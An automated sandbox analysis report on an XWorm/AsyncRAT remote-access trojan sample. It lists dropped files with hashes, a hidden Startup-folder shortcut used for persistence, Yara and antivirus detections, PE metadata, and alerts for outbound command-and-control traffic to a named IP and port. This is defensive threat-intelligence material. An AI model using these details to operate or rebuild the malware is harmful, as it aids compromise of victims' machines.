                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:Generic INItialization configuration [WIN]
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):3.6722687970803873
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                                        MD5:DE63D53293EBACE29F3F54832D739D40
                                                                                        SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                                        SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                                        SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                                        Malicious:false
                                                                                        Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h55bruw.tem.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3agkul3e.q0v.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45jajqpv.ckk.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tj4wwl5.pd0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fcblpik.4c5.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aee5afo4.uam.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dw41akkw.p12.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gugco2nd.yne.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3rb1oi3.w4v.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ungc3s.f10.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwnlhlwi.10n.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jskv5t0y.1fj.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltcfqr50.vy1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oypyvajq.kx3.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pi4myg1x.5cx.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd1ndczj.wtr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coding.lnk

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\24572628.exe
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 7 04:01:27 2025, mtime=Tue Jan 7 04:01:27 2025, atime=Tue Jan 7 04:01:27 2025, length=75776, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):634
                                                                                        Entropy (8bit):4.580394979814711
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:4xtQlXXMf+RcMreiXuhEtHGCF1qS4pWJ0ljAlPtvfUSD6bhEZGx2/miUymoy0nJb:8WMf+Rcm9ueUS+ccjAhfZGbNxgU1dmV
                                                                                        MD5:4B1396A1A29DE951C146ABFA0F127DA6
                                                                                        SHA1:8AC6AF8223CB23D28BA1CD83BC9132B3BA8ACF6A
                                                                                        SHA-256:A8C22C39AEF3E951EECCFC6F3BA9E2015EADC12966B200B69702E6759FEE2DDB
                                                                                        SHA-512:4E63D5C2DC36C226A2F18B0E5596BF7F8045B37A884E2280030CC021B71561B82CC137BD5CA4A68963752D309DDC9F669C31EB24E1851946ACC1DFA535D3C541
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ..fU.4.`..fU.4.`..fU.4.`...(...........................P.O. .:i.....+00.../C:\...................`.1.....'Z.(. PROGRA~3..H......O.I'Z.(....g........................P.r.o.g.r.a.m.D.a.t.a.....T.2..(..'Z.( coding..>......'Z.('Z.(.....)........................c.o.d.i.n.g.......D...............-.......C............I.6.....C:\ProgramData\coding..-.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.c.o.d.i.n.g.`.......X.......181598...........hT..CrF.f4... ..qX.....,...W..hT..CrF.f4... ..qX.....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                        C:\Users\user\Desktop\24572628.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):75776
                                                                                        Entropy (8bit):5.94947504067525
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z1fsaWa6B6zIJgfxtrjSvbqpU+CgEEL6DQrGR8mOOrxkajucVB:RfsaWajIJi6bq2lEprGiONkaju+B
                                                                                        MD5:FFD51738DC3483954A7BCDFAF713DB10
                                                                                        SHA1:3B643A4AD443A5EF249B1C02D0CDB927F5AE38E6
                                                                                        SHA-256:6A2BDC82837DA65C36AF89091F9B1282AE735DED04985BA44759466E4F47C394
                                                                                        SHA-512:67B5AC3FDB9C771F13603D9D78461751172A71EB6B236A55A7BA9C51D96B98C79A615D13F677317189007BA24F452B1B53B31356ACB25913BCEEA6313D84D452
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\24572628.exe, Author: Joe Security
                                                                                        • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\Desktop\24572628.exe, Author: Sekoia.io
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Desktop\24572628.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................<... ...@....@.. ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................<......H........b..........&.....................................................(....*.r...p*. C~..*..(....*.ry..p*. ....*.s.........s.........s.........s.........*.r...p*. y.".*.ri..p*. ....*.r...p*. *p{.*.rY..p*. .O..*.r...p*. /?..*..((...*.r!..p*. .H..*.r{..p*. ..e.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. S...*.r?..p*.r...p*. 9/T.*.r...p*. ....*.rM..p*. E/..*.r...p*. ....*.r...p*.r[.

                                                                                        C:\Users\user\Desktop\xxx.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\YPzNsfg4nR.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6
                                                                                        Entropy (8bit):1.2516291673878228
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:i:i
                                                                                        MD5:8CE415126388942B00CCF21460675DFE
                                                                                        SHA1:7429BD9C85859C88720A23206E62FF9FA5E078ED
                                                                                        SHA-256:AF0C5ABBE62B24372BC89B5EBBECDA85F17EB51B1DAA8BB300D8336885396B29
                                                                                        SHA-512:0DF196F8BCA531389D99C5435545509260AF25619BDEE894B05B7EEC78D076703540A13C0D076DCE0F5AFF57BC1AB83675E1AA6291A6151AC1891B6ED64AF750
                                                                                        Malicious:false
                                                                                        Preview:0000..

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.978930596680155
                                                                                        TrID:
                                                                                        • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                        • Win64 Executable Console (202006/5) 47.64%
                                                                                        • Win64 Executable (generic) (12005/4) 2.83%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                        • DOS Executable Generic (2002/1) 0.47%
                                                                                        File name:YPzNsfg4nR.exe
                                                                                        File size:209'408 bytes
                                                                                        MD5:47f35ed89ba0b7756cc4d268e7516f55
                                                                                        SHA1:714b90afdccaee669f5e2edd1b8680c4631cffa0
                                                                                        SHA256:691c8281d68680d1f8966d657bfbcf4d100c7a70d6894493946793cc320623a6
                                                                                        SHA512:248494a501923a303c540fcf6d2ce42af2ece7fc48fd236c344d7d809df0c978468067ac2cf6d8699cb5635273cce84e630ab9d5ee9d2025abc1d407915600b0
                                                                                        SSDEEP:6144:MtajSmYx6g7Fn/hZR9ICPtajSmYx6g7Fn/hZR9IC:yajPYx6g7FnXYUajPYx6g7FnXY
                                                                                        TLSH:F624F1BA84E45437C84416F64EBD6FB18AD7F44E02538CF99AB0D8F544B2764C6F7888
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....a............"...0..*............... .....@..... ....................................`...@......@............... .....

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x140000000
                                                                                        Entrypoint Section:
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xA7BF61F9 [Sat Mar 8 08:25:29 2059 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        dec ebp
                                                                                        pop edx
                                                                                        nop
                                                                                        add byte ptr [ebx], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax+eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x578.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x347f00x54.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x328f00x32a00a10b7a436dbe7a44139d74bacb67dd0bFalse0.9693672839506173data7.988299230220677IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x360000x5780x600255a5c29385a2b32359b609451859123False0.3977864583333333data4.068795341618418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x360900x2e8data0.4153225806451613
                                                                                        RT_MANIFEST0x363880x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2025-01-07T06:01:39.003798+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549999147.185.221.2139219TCP
                                                                                        2025-01-07T06:02:05.111357+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.550007147.185.221.2139219TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jan 7, 2025 06:00:26.587495089 CET4974380192.168.2.5208.95.112.1
                                                                                        Jan 7, 2025 06:00:26.592451096 CET8049743208.95.112.1192.168.2.5
                                                                                        Jan 7, 2025 06:00:26.594413996 CET4974380192.168.2.5208.95.112.1
                                                                                        Jan 7, 2025 06:00:26.594882011 CET4974380192.168.2.5208.95.112.1
